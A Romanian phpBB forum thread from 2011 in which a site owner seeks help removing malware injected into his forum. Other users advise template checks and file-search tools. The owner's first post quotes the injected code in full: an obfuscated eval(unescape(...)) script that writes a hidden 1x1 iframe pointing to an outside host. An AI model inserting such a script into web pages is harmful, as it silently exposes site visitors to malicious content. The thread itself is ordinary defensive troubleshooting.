phpBB România

forumul phpBB in limba romana. Opinii, implementari, ajutor, instructiuni si download.
https://phpbb3.ro/community/

Malware in forum

https://phpbb3.ro/community/viewtopic.php?t=17616

Pagina 1 din 1

Malware in forum

Scris: 05-Ian-2011, 23:35:53
de claudiu16s
Salutare tuturor!

De cate zile ma am un malware in forum si nu pot sa imi dau seama unde este bagat.Am folosit google pentru webmasteri si am accesat forumul cu google bot si iata cum imi vede:

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 10:55:01 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
Set-Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; expires=Fri, 23-Dec-2011 10:55:01 GMT; path=/
Set-Cookie: phpbb2mysql_sid=f543f7803e1d864589c0f9cde2621a50; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%34%37%33%34%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">
<meta http-equiv="Content-Style-Type" content="text/css">

<link rel="top" href="./index.php?sid=f543f7803e1d864589c0f9cde2621a50" title="Pagina de start a forumului sacredtreasure.org" />
<link rel="search" href="./search.php?sid=f543f7803e1d864589c0f9cde2621a50" title="Căutare" />
<link rel="help" href="./faq.php?sid=f543f7803e1d864589c0f9cde2621a50" title="Întrebări frecvente" />
<link rel="author" href="./memberlist.php?sid=f543f7803e1d864589c0f9cde2621a50" title="Lista membrilor" />

<title>sacredtreasure.org :: Pagina de start</title>
<!-- link rel="stylesheet" href="templates/subSilver/subSilver.css" type="text/css" -->
<style type="text/css">
<!--
/*
The original subSilver Theme for phpBB version 2+
Created by subBlue design
http://www.subBlue.com

NOTE: These CSS definitions are stored within the main page body so that you can use the phpBB2
theme administration centre. When you have finalised your style you could cut the final CSS code
and place it in an external file, deleting this section to save bandwidth.
*/

Stiti cumva unde as putea localiza codul asta? Multumesc!

Re: Malware in forum

Scris: 05-Ian-2011, 23:47:13
de bogdan
Cauta in styles/stilul_tau/template/overall_header.html. Curata codul anormal si apoi curata cache-ul forumului.

Altfel descarca forumul pe local si foloseste Agent Ransack sa cauti prin fisierele forumului.

Re: Malware in forum

Scris: 06-Ian-2011, 00:14:29
de claudiu16s
Mersi mult de tot.

A mers perfect cu Agent Ransack.

Re: Malware in forum

Scris: 16-Ian-2011, 01:11:11
de claudiu16s
Exista cumva vreun program caruia sa-i dau codul de exemplu "<script>eval(unescape(........)" si sa caute in toate fisierele forumului si sa stearga acea fraza?

Mentionez ca in Agent Ransack nu am gasit un astfel de tool.Intreb asta pentru ca am gasit codul suspect in peste 1300 de fisiere si e cam dificil sa sterg manual.

Mersi!

Re: Malware in forum

Scris: 16-Ian-2011, 01:45:47
de bogdan
Tu ai peste 1300 de fisiere intr-un forum?!?

Folosesti Grep in Unix sau Wingrep in Windows.

Re: Malware in forum

Scris: 16-Ian-2011, 01:50:28
de claudiu16s
Este un forum si un site si s-au infectat ambele. :D
Ora este UTC+03:00
Pagina 1 din 1

Furnizat de phpBB® Forum Software © phpBB Limited

Translation/Traducere: phpBB România